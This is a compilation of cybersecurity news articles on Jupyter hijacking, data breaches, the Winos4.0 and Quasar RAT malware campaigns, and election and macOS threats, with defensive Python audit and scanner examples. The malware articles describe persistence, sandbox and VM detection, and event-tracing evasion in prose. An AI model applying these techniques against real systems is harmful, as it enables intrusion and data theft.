
Hackers Exploit Jupyter Notebooks for Sports Piracy Through Stream Ripping Tools


Malicious hackers are taking advantage of misconfigured JupyterLab and Jupyter Notebooks to facilitate sports piracy through live stream capture tools, according to a report by Aqua Security shared with The Hacker News.

The attack involves hijacking unauthenticated Jupyter Notebooks to gain initial access and execute a series of steps aimed at illegally streaming sports events. This activity was uncovered during an investigation into attacks on Aqua's honeypots.

"First, the attacker updated the server, then downloaded the tool FFmpeg," explained Assaf Morag, director of threat intelligence at Aqua Security. "This action alone is not a strong enough indicator for security tools to flag malicious activity."

Morag noted that the attackers then executed FFmpeg to capture live sports streams, redirecting them to their server. The campaign’s ultimate objective is to download FFmpeg from MediaFire, capture live feeds from Qatari network beIN Sports, and rebroadcast the content illegally via ustream[.]tv. This tactic allows the attackers to misuse compromised Jupyter Notebook servers as intermediaries while profiting from advertising revenues linked to the unauthorized streams.

Although the identity of the hackers remains unclear, one of the IP addresses used (41.200.191[.]23) suggests they may originate from an Arabic-speaking region.

"However, it's crucial to remember that the attackers gained access to a server intended for data analysis, which could have serious consequences for any organization's operations," Morag added.

He warned that the risks extend beyond piracy, potentially leading to denial-of-service attacks, data manipulation, theft, corruption of AI and ML processes, lateral movement within critical systems, and severe financial and reputational harm.
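The root cause above is a notebook server reachable without a token or password. As an added example (not Aqua Security's or the Jupyter project's code), the script below audits a Jupyter configuration for that exposure; it assumes the documented config shapes, `jupyter_server_config.json` keyed by traitlet class (`{"ServerApp": {...}}`) and the Python form `c.ServerApp.token = ''`, with the classic `NotebookApp` using the same keys, and the severity labels are its own.

```python
"""Flag Jupyter server settings that let anyone who can reach the port run code."""
import ast
import json
import re

# Traitlet classes of Jupyter Server and the classic Notebook server.
APPS = ("ServerApp", "NotebookApp")
PY_LINE = re.compile(r"^\s*c\.(ServerApp|NotebookApp)\.(\w+)\s*=\s*(.+?)\s*$")


def parse_py_config(text):
    """Turn `c.<App>.<key> = <literal>` lines into {app: {key: value}}."""
    cfg = {}
    for line in text.splitlines():
        code = line.split("#", 1)[0]  # drop trailing comments (naive: no '#' inside strings)
        m = PY_LINE.match(code)
        if not m:
            continue
        app, key, raw = m.groups()
        try:
            value = ast.literal_eval(raw)
        except (ValueError, SyntaxError):
            value = raw  # keep non-literal expressions as text
        cfg.setdefault(app, {})[key] = value
    return cfg


def audit(cfg):
    """Return (severity, message) findings for each configured app."""
    findings = []
    for app in APPS:
        s = cfg.get(app) or {}
        if not s:
            continue
        token = s.get("token")
        has_password = bool(s.get("password") or s.get("hashed_password"))
        ip = str(s.get("ip", "localhost"))
        # Jupyter generates a random token by default; only an explicit empty
        # string switches token auth off. With no password either, the server is open.
        if token == "" and not has_password:
            findings.append(("CRITICAL", f"{app}: no token and no password; anyone reaching the port can execute code"))
        if ip in ("0.0.0.0", "*", "::"):
            findings.append(("HIGH", f"{app}: bound to all interfaces ({ip}) instead of localhost"))
        if s.get("allow_root"):
            findings.append(("MEDIUM", f"{app}: allow_root=True, kernels run as root"))
        if s.get("allow_origin") == "*":
            findings.append(("MEDIUM", f"{app}: allow_origin='*' permits cross-site requests to the API"))
    return findings


def audit_json(text):
    return audit(json.loads(text))


# Constructed samples: the kind of open configuration found on the honeypots,
# and a hardened one that keeps the server on localhost behind a token.
EXPOSED_JSON = json.dumps({"ServerApp": {"ip": "0.0.0.0", "token": "", "password": "",
                                          "allow_root": True, "allow_origin": "*"}})
HARDENED_PY = """
c.ServerApp.ip = '127.0.0.1'  # reach it through an SSH tunnel or an authenticating proxy
c.ServerApp.token = 'REPLACE-WITH-LONG-RANDOM-TOKEN'
c.ServerApp.allow_root = False
"""

if __name__ == "__main__":
    for sev, msg in audit_json(EXPOSED_JSON):
        print(sev, msg)
    print("hardened:", audit(parse_py_config(HARDENED_PY)) or "no findings")
```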

Set Forth Data Breach: 1.5 Million Impacted and Next Steps


The debt relief firm Set Forth recently experienced a data breach that compromised the sensitive personal and financial information of approximately 1.5 million Americans. Hackers gained unauthorized access to internal documents stored on the company’s systems, raising serious concerns about identity theft and online fraud for the affected individuals. Set Forth, which provides administrative services for Americans enrolled in debt relief programs and works with B2B partners like Centrex, has initiated notification protocols to inform impacted customers. The breach reportedly occurred in May this year, at which time Set Forth implemented incident response measures and enlisted independent forensic specialists to investigate the incident. 

However, the full extent of the attack is now coming to light. According to the company’s notification to the Maine Attorney General, the hackers accessed a range of personal data, including full names, Social Security numbers (SSNs), and dates of birth. Additionally, information about spouses, co-applicants, or dependents of the affected individuals may have been compromised. Although there is currently no evidence that the stolen data has been used maliciously, experts warn that it could end up on the dark web or be utilized in targeted phishing campaigns. This breach highlights the ongoing risks associated with storing sensitive information digitally, as even companies with incident response plans can become vulnerable to sophisticated cyberattacks. 

To mitigate the potential damage, Set Forth is offering free access to Cyberscout, an identity theft protection service, for one year to those affected. Cyberscout, which has over two decades of experience handling breach responses, provides monitoring and support to help protect against identity fraud. Impacted customers will receive notification letters containing instructions and a code to enroll in this service. For those affected by the breach, vigilance is critical. Monitoring financial accounts for unauthorized activity is essential, as stolen SSNs can enable hackers to open lines of credit, apply for loans, or even commit crimes in the victim’s name. 

Additionally, individuals should remain cautious when checking emails or messages, as hackers may use the breach as leverage to execute phishing scams. Suspicious emails—particularly those with urgent language, unknown senders, or blank subject lines—should be deleted without clicking links or downloading attachments. This incident serves as a reminder of the potential risks posed by data breaches and the importance of proactive protection measures. While Set Forth has taken steps to assist affected individuals, the breach underscores the need for businesses to strengthen their cybersecurity defenses. For now, impacted customers should take advantage of the identity theft protection services being offered and remain alert to potential signs of fraud.

How to Prevent a Ransomware Attack and Secure Your Business


In today’s world, the threat of cyberattacks is an ever-present concern for businesses of all sizes. The scenario of receiving a call at 4 a.m. informing you that your company has been hit by a ransomware attack is no longer a mere fiction; it’s a reality that has affected several major companies globally. In one such instance, Norsk Hydro, a leading aluminum and renewable energy company, suffered a devastating ransomware attack in 2019, costing the company an estimated $70 million. This incident highlights the vulnerabilities companies face in the digital age and the immense financial and reputational toll a cyberattack can cause. 

Ransomware attacks typically involve hackers encrypting sensitive company data and demanding a hefty sum in exchange for decryption keys. Norsk Hydro chose not to pay the ransom, opting instead to rebuild their systems from scratch. Although this route avoided funding cybercriminals, it proved costly in both time and resources. The question remains: what can be done to prevent such attacks from occurring in the first place? The key to preventing ransomware and other cyber threats lies in building a robust security infrastructure. First and foremost, organizations should implement strict role-based access controls. By defining specific roles for employees and limiting access to sensitive systems based on their responsibilities, businesses can reduce the attack surface. 

For example, financial analysts should not have access to software development repositories, and developers shouldn’t be able to access the HR systems. This limits the number of users who can inadvertently expose critical systems to threats. When employees change roles or leave the company, it’s essential to adjust their access rights to prevent potential exploitation. Additionally, organizations should periodically ask employees whether they still require access to certain systems. If access hasn’t been used for a prolonged period, it should be removed, reducing the risk of attack. Another critical aspect of cybersecurity is the implementation of a zero-trust model. A zero-trust security approach assumes that no one, whether inside or outside the organization, should be trusted by default. 

Every request, whether it comes from a device on the corporate network or a remote one, must be verified. This means using tools like single sign-on (SSO) to authenticate users, as well as device management systems to assess the security of devices trying to access company resources. By making trust contingent on verification, companies can significantly mitigate the chances of a successful attack. Moreover, adopting a zero-trust strategy requires monitoring and controlling which applications employees can run on their devices. Unauthorized software, such as penetration testing tools like Metasploit, should be restricted to only those employees whose roles require them. 

This practice not only improves security but also ensures that employees are using the tools necessary for their tasks, without unnecessary exposure to cyber risks. Finally, no security strategy is complete without regular fire drills and incident response exercises. Preparing for the worst-case scenario means having well-documented procedures and ensuring that every employee knows their role during a crisis. Panic and confusion can worsen the impact of an attack, so rehearsing responses and creating a calm, effective plan can make all the difference. 

Preventing cyberattacks requires a combination of technical measures, strategic planning, and a proactive security mindset across the entire organization. Business leaders must prioritize cybersecurity just as they would profitability, growth, and other business metrics. By doing so, they will not only protect their data but also ensure a safer future for their company, employees, and customers. The impact of a well-prepared security system is immeasurable and could be the difference between an incident being a minor inconvenience or a catastrophic event.
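As an added example (not from the post), here is a small access review that applies the rules above: entitlements held by departed users, entitlements outside what the user's current role permits (which also catches role changes), and entitlements unused for a prolonged period. The role matrix, the 90-day threshold and the sample records are constructed for illustration.

```python
"""Quarterly access review: which entitlements should be revoked and why."""
from datetime import datetime, timedelta

# Constructed role matrix mirroring the post's examples: analysts stay out of
# code repositories, developers stay out of the HR system.
ROLE_ALLOWED = {
    "financial_analyst": {"finance_ledger", "bi_reporting"},
    "developer": {"source_repo", "ci_pipeline"},
    "hr_specialist": {"hr_system"},
}
STALE_AFTER = timedelta(days=90)  # constructed threshold for "prolonged period"


def review_access(users, entitlements, now):
    """Return a list of (user, system, reason) that should be revoked.

    users: {username: {"role": str, "active": bool}} - the current HR state.
    entitlements: list of {"user", "system", "last_used": datetime or None}.
    """
    revoke = []
    for ent in entitlements:
        user = users.get(ent["user"])
        system = ent["system"]
        if user is None or not user["active"]:
            revoke.append((ent["user"], system, "account no longer active"))
            continue
        if system not in ROLE_ALLOWED.get(user["role"], set()):
            # Covers both a wrong grant and a grant left over from a previous role.
            revoke.append((ent["user"], system, f"not permitted for role {user['role']}"))
            continue
        last = ent["last_used"]
        if last is None or now - last > STALE_AFTER:
            revoke.append((ent["user"], system, "unused for more than 90 days"))
    return revoke


# Constructed sample: bob moved from development to HR but kept repo access,
# alice (an analyst) was granted repo access, carol never used the CI pipeline,
# and dave has left the company.
USERS = {
    "alice": {"role": "financial_analyst", "active": True},
    "bob": {"role": "hr_specialist", "active": True},
    "carol": {"role": "developer", "active": True},
    "dave": {"role": "developer", "active": False},
}
NOW = datetime(2024, 11, 20)
ENTITLEMENTS = [
    {"user": "alice", "system": "finance_ledger", "last_used": NOW - timedelta(days=3)},
    {"user": "alice", "system": "source_repo", "last_used": NOW - timedelta(days=1)},
    {"user": "bob", "system": "source_repo", "last_used": NOW - timedelta(days=200)},
    {"user": "bob", "system": "hr_system", "last_used": NOW - timedelta(days=2)},
    {"user": "carol", "system": "ci_pipeline", "last_used": None},
    {"user": "carol", "system": "source_repo", "last_used": NOW - timedelta(days=10)},
    {"user": "dave", "system": "source_repo", "last_used": NOW - timedelta(days=40)},
]


def sample_review():
    return review_access(USERS, ENTITLEMENTS, NOW)


if __name__ == "__main__":
    for user, system, reason in sample_review():
        print(f"revoke {user} -> {system}: {reason}")
```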

Growing Use of Winos4.0 Toolkit Poses New Threat to Windows Users

The advanced hacking toolkit Winos4.0 is spreading across the globe, security experts warn. Originally reported by Trend Micro, this new toolkit, much like the well-known Cobalt Strike and Sliver frameworks, has been connected to a string of recent cyber attacks in China, where it initially spread through fake software downloads. This year, Fortinet reported that the toolkit is also being distributed through game-themed files, which suggests the campaign is expanding and might put a larger user base at risk.


Attack Framework

Winos4.0 is a post-exploitation toolkit: after gaining initial access to a system, attackers use it to extend their intrusion and take control. It was first discovered inside applications that users downloaded believing them to be legitimate software, including VPNs and Google Chrome installers for the Chinese market. Operating under the aliases Void Arachne or Silver Fox, the attackers lure users with these popular applications, which are laced with malicious components designed to compromise their systems.

More recently, the attackers have switched to game applications as the carrier for Winos4.0, again targeting mainly Chinese users. In this way, they keep changing the attractive downloads they use to penetrate devices.


Infection Stages

When a victim downloads one of these benign-looking files, the Winos4.0 toolkit starts a four-stage infection:

1. Stage 1: After installation, a DLL file, you.dll, is retrieved from a remote domain. This file establishes persistence on the device by setting values in the Windows Registry so that the malware survives a system restart.

2. Stage 2: In this step, injected shellcode is loaded to resolve the APIs it needs and to communicate with a C2 server, which enables the attackers to send commands and retrieve files from the infected device.

3. Stage 3: The malware fetches more encoded data from the C2 server in the form of a second DLL file, named 上线模块.dll, which it saves in the Windows Registry for later use; it also updates the server addresses to maintain an active link between the malware and its operators.

4. Final Stage: The last stage (login module.dll) activates all the main functions of the toolkit, including detailed system data gathering (such as IP address and OS type), detection of security tools, searches for crypto-wallets, and maintenance of a hidden backdoor. Through this backdoor connection, hackers can exfiltrate data, execute commands, and keep monitoring the system.


Evasion Techniques

Winos4.0 has a built-in scanner that detects security products, including commercial products from Kaspersky, Avast, Bitdefender, and Malwarebytes. It then changes its behaviour to avoid detection, or even quits, if it finds itself running in an environment that is under surveillance. This adaptability makes the tool very dangerous in cybercriminals' hands.


Emerging Menace

The fact that Winos4.0 is still being used and fine-tuned points to its growing role in cyberattack strategies. As Fortinet explains, it is a versatile and powerful framework "designed for remote control of compromised systems." Ongoing activity like this indicates that Winos4.0 is becoming a tool hackers favour for taking control of Windows machines.


Preventive Actions

Security experts constantly warn users to be careful about what they download, especially free software or games that appear popular.

Avoid downloading applications and other files from unknown sources. Verifying that the software or file comes from a legitimate source can also prevent an infection. In addition, security software must be updated frequently.

Awareness of how Winos4.0 spreads can keep many users away from this sophisticated malware.


Meta Struggles to Curb Misleading Ads on Hacked Facebook Pages


Meta, the parent company of Facebook, has come under fire for its failure to adequately prevent misleading political ads from being run on hacked Facebook pages. A recent investigation by ProPublica and the Tow Center for Digital Journalism uncovered that these ads, which exploited deepfake audio of prominent figures like Donald Trump and Joe Biden, falsely promised financial rewards. Users who clicked on these ads were redirected to forms requesting personal information, which was subsequently sold to telemarketers or used in fraudulent schemes. 

One of the key networks involved, operating under the name Patriot Democracy, hijacked more than 340 Facebook pages, including verified accounts like that of Fox News meteorologist Adam Klotz. The network used these pages to push over 160,000 deceptive ads related to elections and social issues, with a combined reach of nearly 900 million views across Facebook and Instagram. The investigation highlighted significant loopholes in Meta’s ad review and enforcement processes. While Meta did remove some of the ads, it failed to catch thousands of others, many with identical or similar content. Even after taking down problematic ads, the platform allowed the associated pages to remain active, enabling the perpetrators to continue their operations by spawning new pages and running more ads. 

Meta’s policies require ads related to elections or social issues to carry “paid for by” disclaimers, identifying the entities behind them. However, the investigation revealed that many of these disclaimers were misleading, listing nonexistent entities. This loophole allowed deceptive networks to continue exploiting users with minimal oversight. The company defended its actions, stating that it invests heavily in trust and safety, utilizing both human and automated systems to review and enforce policies. A Meta spokesperson acknowledged the investigation’s findings and emphasized ongoing efforts to combat scams, impersonation, and spam on the platform. 

However, critics argue that these measures are insufficient and inconsistent, allowing scammers to exploit systemic vulnerabilities repeatedly. The investigation also revealed that some users were duped into fraudulent schemes, such as signing up for unauthorized monthly credit card charges or being manipulated into changing their health insurance plans under false pretences. These scams not only caused financial losses but also left victims vulnerable to further exploitation. Experts have called for more stringent oversight and enforcement from Meta, urging the company to take a proactive stance in combating misinformation and fraud. 

The incident underscores the broader challenges social media platforms face in balancing open access with the need for rigorous content moderation, particularly in the context of politically sensitive content. In conclusion, Meta’s struggle to prevent deceptive ads highlights the complexities of managing a vast digital ecosystem where bad actors continually adapt their tactics. While Meta has made some strides, the persistence of such scams raises serious questions about the platform’s ability to protect its users effectively and maintain the integrity of its advertising systems.

Vietnamese Hackers Target Digital Marketers in Malware Attack

Cyble Research and Intelligence Lab recently uncovered an elaborate, multi-stage malware attack targeting job seekers as well as digital marketing professionals. Behind it is a Vietnamese threat actor who has been using a range of sophisticated techniques, culminating in Quasar RAT, a tool that gives the attacker complete control of an infected computer. 


Phishing emails and LNK files as entry points

The attack begins with phishing emails that carry an attached archive file. Inside the archive is a malicious LNK file disguised as a PDF. Once the LNK is launched, it executes PowerShell commands that download additional malicious scripts from a third-party source, evading most detection solutions. The method is particularly effective in non-virtualized environments, where the malware can remain undiscovered on the system.


Quasar RAT Deployment

The attackers then decrypt the malware payload with hardcoded keys and start Quasar RAT, a remote access trojan that gives them total control over the compromised system. Data can be stolen, other malware can be planted, and the infected device can be operated remotely by the attackers.

The campaign primarily targets digital marketers in the United States who work with Meta (Facebook, Instagram) advertising. The malware files used in the attack were tailored to this type of user, which increases the campaign's chances of success.


Spread using Ducktail Malware

In July 2022, the same Vietnamese threat actors expanded their activities with the launch of Ducktail malware, which specifically targeted digital marketing professionals. The group included information stealers and other RATs in its attacks, and has used malware-as-a-service (MaaS) platforms to scale up and diversify its campaigns over time.


Evasion of Detection in Virtual Environments

What makes this malware attack all the more sophisticated is how well it evades detection in virtual environments. The attackers' "output.bat" file determines whether it is running in a virtual environment by scanning for several hard drive manufacturers and virtual machine signatures such as "QEMU" and "VirtualBox." If the malware detects that it is running in a virtual machine, it stops execution immediately to block analysis.

If no virtual environment is detected, the attack proceeds. The script decodes further components, including a fake PDF and a batch file, which are stored in the victim's Downloads folder under seemingly innocent names such as "PositionApplied_VoyMedia.pdf."


Decryption and Execution Methods

Once the PowerShell script has fully executed, it decrypts strings from the "output.bat" file using hardcoded keys and decompresses them through GZip streams. The result is a .NET executable that runs in memory, giving the malware further evasion against detection by antivirus software.

The malware itself also performs a whole cycle of checks to determine whether it is running in a sandbox or emulated environment. It looks for known file names and DLL modules common in virtualized settings and measures timing discrepancies to detect emulation. If these checks suggest a virtual environment, the malware throws an exception, bringing all subsequent activity to a halt.

Once the malware has infected a system, it immediately checks for administrative privileges. If it does not have them, it uses PowerShell commands for privilege escalation. Once it gains administrative control, it establishes persistence by copying itself to a hidden folder inside the Windows directory and modifying the Windows registry so that it executes automatically at startup.


Defence Evasion and Further Damage 

The malware employs additional defence evasion techniques to go unnoticed. It disables Windows event tracing, which makes it harder for security software to track its activities, and it encrypts and compresses key components so that their actions are even harder to identify.

The last stage of the attack deploys Quasar RAT, a remote access tool used both for stealing data and for maintaining long-term access to the infected system. This adapted version of Quasar RAT is less detectable, so security software will not easily identify or remove it.

This is a multi-stage malware attack against digital marketing professionals, especially those working in Meta advertising. It is a sophisticated and dangerous operation that combines phishing emails, PowerShell commands and advanced evasion techniques to make it even harder to detect and stop. Security experts advise extreme caution when handling email attachments, especially in non-virtualized environments, and conclude that all software and systems must be kept up to date to prevent this kind of threat.
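The entry point of the chain above is an archive attachment holding a Windows shortcut that poses as a PDF. As an added example (not Cyble's code), the scanner below checks archive entries both by name (an executable extension, or a document extension in front of one, which Explorer hides by default) and by content (every .lnk file starts with a 0x4C header size followed by the fixed LinkCLSID 00021401-0000-0000-C000-000000000046), recursing into nested zips; the archive and its file names are constructed for illustration.

```python
"""Flag LNK-as-PDF lures inside a zip attachment, by file name and by file header."""
import io
import zipfile

# First 20 bytes of every ShellLink (.lnk) file: HeaderSize 0x0000004C + LinkCLSID.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
EXEC_EXT = {".lnk", ".bat", ".cmd", ".ps1", ".exe", ".scr", ".vbs", ".js", ".hta"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def classify(name, head):
    """Return the reasons an archive entry is suspicious (empty list if none)."""
    base = name.rsplit("/", 1)[-1].lower()
    exts = ["." + p for p in base.split(".")[1:]]
    reasons = []
    if head.startswith(LNK_MAGIC):
        reasons.append("content is a Windows shortcut (LNK header)")
    if exts and exts[-1] in EXEC_EXT:
        reasons.append(f"executable extension {exts[-1]}")
    if len(exts) >= 2 and exts[-2] in DOC_EXT and exts[-1] in EXEC_EXT:
        reasons.append("document extension in front of an executable one")
    return reasons


def scan_archive(data, depth=0, max_depth=2):
    """Walk a zip in memory, recursing into nested zips, and return [(entry, reason)]."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            content = zf.read(info)
            if info.filename.lower().endswith(".zip") and depth < max_depth:
                for inner, reason in scan_archive(content, depth + 1, max_depth):
                    findings.append((info.filename + "!" + inner, reason))
                continue
            for reason in classify(info.filename, content[:32]):
                findings.append((info.filename, reason))
    return findings


def build_sample():
    """Constructed lure archive: a double-extension LNK, an LNK whose name claims
    to be a PDF, a genuine PDF, and a nested zip carrying a batch file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("PositionApplied_VoyMedia.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("cover_letter.pdf", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("resume.pdf", b"%PDF-1.4\n%constructed sample\n")
        inner = io.BytesIO()
        with zipfile.ZipFile(inner, "w") as nested:
            nested.writestr("notes.txt", b"nothing to see")
            nested.writestr("run.bat", b"@echo constructed")
        zf.writestr("extras.zip", inner.getvalue())
    return buf.getvalue()


def flagged_entries(data):
    """Sorted, de-duplicated list of suspicious entry paths in an archive."""
    return sorted({entry for entry, _ in scan_archive(data)})


if __name__ == "__main__":
    for entry, reason in scan_archive(build_sample()):
        print(f"{entry}: {reason}")
```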


China-backed Hackers Breach U.S. Telecom Wiretap Systems, Sparking Security Concerns


China-backed hackers infiltrated wiretap systems of multiple U.S. telecom and internet providers, reportedly seeking to collect intelligence on American citizens. This revelation has raised alarm in the security community.

Wiretap systems, required by a 30-year-old U.S. federal law, allow a small number of authorized employees access to sensitive customer data, including internet activity and browsing history. These systems, now compromised, highlight long-standing concerns about their vulnerability.

Security experts had long warned about the risks of legal backdoors in telecom systems. Many saw this breach as an inevitable outcome of such vulnerabilities being exploited by malicious actors. Georgetown Law professor Matt Blaze remarked that this scenario was “absolutely inevitable.”

According to the Wall Street Journal, the hacking group, Salt Typhoon, accessed systems used by major U.S. internet providers like AT&T, Lumen, and Verizon. The group reportedly collected large amounts of internet traffic, and a U.S. government investigation is now underway.

The hackers' goals remain unclear, but experts believe the breach could be part of a larger Chinese effort to prepare for potential cyberattacks in the event of conflict, possibly over Taiwan. The intrusion reinforces the dangers of security backdoors.

Riana Pfefferkorn, a Stanford academic, pointed out that this hack exposes the risks of U.S. wiretap systems, arguing that these measures jeopardize citizens’ privacy rather than protecting them. She advocates for increased encryption as a solution to these vulnerabilities.

The compromised wiretap systems are part of the Communications Assistance for Law Enforcement Act (CALEA), a law enacted in 1994 to help the government access telecom data through lawful orders. However, this system has become a target for hackers and malicious actors.

After 9/11, U.S. surveillance laws expanded wiretapping to collect intelligence, sparking an entire industry dedicated to facilitating these operations. Yet, the extent of government access to private data was only exposed in 2013 by whistleblower Edward Snowden.

Post-Snowden, tech giants like Apple and Google began encrypting customer data to prevent unauthorized access, even from government agencies. However, telecom companies have been slower to follow suit, leaving much U.S. phone and internet traffic vulnerable to wiretapping.

Governments worldwide continue to push for legal backdoors into encrypted systems. In the EU, for example, proposed laws aim to scan private messages for illegal content, raising security concerns among experts.

Signal, the encrypted messaging app, warned of the dangers of backdoors, pointing to the Chinese hacking incident as an example of why such measures pose severe cybersecurity risks. Meredith Whittaker, Signal’s president, stressed that backdoors cannot be restricted to just "the good guys."

Blaze called the CALEA law a cautionary tale, emphasizing the dangers of building security systems with inherent vulnerabilities.

Shocking Ways Hackers Can Exploit Your IP Address – You’re Not as Safe as You Think
Your IP address may look like just a string of numbers, but to a hacker it can be an instrument for malicious activity. Although exposure of your IP does not pose an immediate danger in itself, it is important to understand what a hacker can do with it. Let's break down how cybercriminals can exploit an IP and how you can keep it safe.

Determining Your Broad Area of Location

The first thing a hacker can easily learn from your IP address is your general location. Simple online tools such as IP lookup websites reveal your city or region. They will not pinpoint your street address, but knowing your general area can feed other attacks such as phishing: hackers may combine your location and ISP to make social engineering attempts more convincing.

IP Spoofing: Identity Mimicry Online

A hacker can manipulate IP addresses so that actions they perform appear to come from your device. With this method, known as IP spoofing, hackers carry out various illegal activities while concealing their identity. IP spoofing is commonly used in DDoS attacks, in which hackers flood a network with enormous amounts of traffic to shut it down. Using your IP address during such an attack may keep them undetected while they cause the damage.

Selling Your IP Address

A single address may seem insignificant, but hackers sell bundles of thousands of IP addresses across the dark web, and those addresses can be used in large-scale social engineering campaigns that lead to data theft. Combined with other personal data, your IP address can be a valuable commodity in a hacker's arsenal, helping them break into almost any online account.

Scanning for Further Information

With tools such as Nmap, hackers who have your IP can also uncover which OS your machine is running, which applications are installed, and which ports are open. If vulnerabilities exist in your system, they can launch attacks on those specific weaknesses, which may let them get into your network and even control your devices.

A DDoS attack

Although DDoS attacks on individual users are rare, hackers can use your IP to flood your device with traffic and take it offline. Such attacks are usually aimed at larger organisations, although people engaged in online gaming and other competitive activities are also at risk. For instance, some players have used DDoS attacks to cut off their opponents' internet.

How to Hide Your IP Address

The likelihood that someone is actually targeting you may be low, but it is still important to follow these safety precautions. With a virtual private network or a proxy server, your public IP address remains hidden, which makes it much harder for hackers to find and take advantage of it. You can also protect your devices by updating them as regularly as possible and using firewalls.

It is important to note that knowing an IP address does not give hackers total control over your system. However, it can be part of a scheme that brings them closer to extracting more personal information or conducting attacks. Usually there is little chance that someone would go out of their way to harm you using just your IP address; still, you can never be too safe. Securing your network and masking your IP simply reduces the risk of IP-based attacks.

Take care and keep preventative measures in place so that nobody can use these tactics against you.


Election Sabotage via Cyberattacks Increases

Several forecasts have pointed out that 2024 will be not only a major election year but also a year of civil rights. Security researchers have identified an increasing trend of malicious cyber activity aimed at imperilling sovereign elections around the world in what is being called one of the most important election years of all time. In 2024, there will be more malicious cyber activity attempting to undermine elections than ever before. 

This trend is particularly concerning during a time of unprecedented geopolitical volatility, with 64 countries (including the European Union) holding national elections in the coming year, according to Time Magazine. The number of eligible voters in these elections amounts to approximately 2 billion, almost 49 per cent of the world's population. 

The results of these elections will have lasting consequences for many of these voters for years to come, according to Time Magazine, which reported on them earlier this week. In terms of geopolitical relations and military conflicts around the world, the U.S. presidential election has been by far the most important contest this year. 

Expectations are that the outcome of this election could cause a profound change in the future of global conflict. This rise in tension is occurring at a time when there is a deepening political divide in the US, as well as increasing tensions abroad over Gaza, Ukraine, and other issues. 

The US is certainly not the only country under scrutiny, so what critical threats should people pay attention to, and in what ways might they harm the democratic process as a whole? Mounting evidence makes it increasingly clear that cybercriminals have expanded their arsenal of tools to disrupt and influence elections as the escalating war on democracy gains momentum. 

They use a variety of methods, and these are becoming more sophisticated over time. In some cases, a breach of personal data is directly linked to an attack on critical infrastructure and the dangers of protecting that infrastructure. Over the years, cybercriminals have honed their skills at stealing and releasing private information about political figures, which they use to manipulate public opinion and public policy. They have also become experts at social engineering, often tricking people into giving up their account or system passwords, or into downloading and running malware, through e-mails and text messages that appear legitimate but are fake and malicious.

Attackers can also exploit software vulnerabilities in applications, devices, computers, or servers, and these vulnerabilities can be purchased on black markets, which has led to an increase in cybercrime. Social media platforms, for their part, were designed to amplify sensationalist headlines, frequently encouraging users to share them even when there is doubt about their accuracy. Under this bombardment of misinformation, public understanding has been muddied, dangerous conspiracy theories are being cultivated, and opinions and actions are being manipulated by deception and deceit. 

In manoeuvres such as the so-called "firehose of falsehood," citizens are bombarded with so many falsehoods that they cannot discern right from wrong, and their faith in government and political institutions is undermined as a result. For example, someone can impersonate a candidate's social media profiles, which are then used to mislead voters about the candidate's political views or about the candidates themselves. 

Deepfakes pose a further challenge, alongside doctored videos and photos designed to look authentic while conveying false information. Even when such disinformation is detected and corrected, the damage may already be done in the minds of the voters who were exposed to it. This election season has seen a rise in misinformation campaigns designed to discourage voters from going to the polls, as well as cyberbullying and threats aimed at silencing candidates and public figures.

As trolls sow discord and intimidation across social media platforms, they stifle meaningful participation by marginalised groups. Foreign actors can marginalise legitimate citizen voices and undermine the democratic process in many ways, disrupting online discussions and deploying strategic ad campaigns, bots and troll armies. Before the start of 2024, the Canadian Centre for Cyber Security (CCCS) published a report noting an increase in cyberattacks targeting elections, consistent with Resecurity's own findings and conclusions.

The proportion of national elections in which cyber adversaries targeted the ballot box rose from 10 per cent in 2015 to 26 per cent in 2022. The CCCS report shows that approximately 25 per cent and 35 per cent of the countries targeted during its reporting period were NATO countries and, more recently, OECD countries respectively. Resecurity, moreover, observed a 100 per cent increase in activity between its previous analysis period and 2023 to early 2024, alongside the continued targeting of the United States and its allies.

As part of this assessment, Resecurity observed a total of 15 incidents and reported them to the appropriate authorities, spanning Africa, the European Union, the United Kingdom, Ecuador, Bangladesh, Indonesia, Israel, Iraq, Lebanon, Turkey and Mexico, as well as other regions. Threat actors are engaged not only in cyber espionage but also in operations intended to disrupt and manipulate public opinion, much like those conducted during the Cold War.

These incidents remain difficult to investigate, and it is often not obvious to the public that they are occurring. In a volatile and uncertain geopolitical period, marked by escalating conflicts in the Middle East and Eastern Europe, securing elections against hostile cyber threats has become essential to sustaining the global democratic order. The report focuses on malign cyber activity targeting elections in more than 17 countries over the coming months.

Disruptive cyber techniques that threaten the fabric of democratic processes from within pose a profound and far-reaching threat. A cyberattack on a political campaign is not merely a violation of personal privacy; it is a calculated effort to manipulate democratic processes and sow discord among voters. Left unchecked, such acts of digital sabotage will continue to erode public trust in an electoral system valued for its transparency and legitimacy, further weakening an already deeply divided society.

Mac Users Targeted by Hackers Through Microsoft App Security Flaw

During the past couple of weeks, Cisco Talos has disclosed eight security vulnerabilities in Microsoft's applications for macOS. Attackers who exploit these bugs can reach the cameras and microphones of users of those applications, and the same weakness could be used to steal other kinds of sensitive information, undermining the security of the system as a whole.

Many widely used Microsoft apps, including Word, Outlook, Excel, OneNote and Teams, are affected. To carry out the attack, malicious libraries are injected into the Microsoft apps so that the attacker inherits the entitlements and permissions the user has granted them. The problem stems from how Microsoft's apps interact with the Transparency, Consent, and Control (TCC) framework on macOS, which governs the permissions applications hold on the system.

The vulnerability in Microsoft's Mac apps makes it possible for attackers to spy on Mac users without their knowledge. A Cisco Talos researcher published a blog post explaining how attackers could exploit the vulnerability on macOS and what Microsoft has done to fix it. According to Cisco Talos, Microsoft's macOS apps, including Outlook, Word, Teams, OneNote and Excel, contain a flaw that lets attackers inject malicious libraries into them, gaining access to the permissions and entitlements granted by the user.

On macOS, permission-based access to user data relies on the Transparency, Consent, and Control framework. macOS asks the user for permission before an app first touches a protected resource and displays prompts when an app requests sensitive data such as contacts, photos or webcam access. The severity of these vulnerabilities varies depending on the app and the permissions it holds.

Microsoft Teams, a popular tool for professional communication, could for instance be abused to capture conversations or access sensitive information. Microsoft Outlook could be used to send unauthorised emails and, ultimately, cause data breaches, the report notes. Under TCC, apps must request specific entitlements to access features such as the camera, microphone and location services on the Mac.

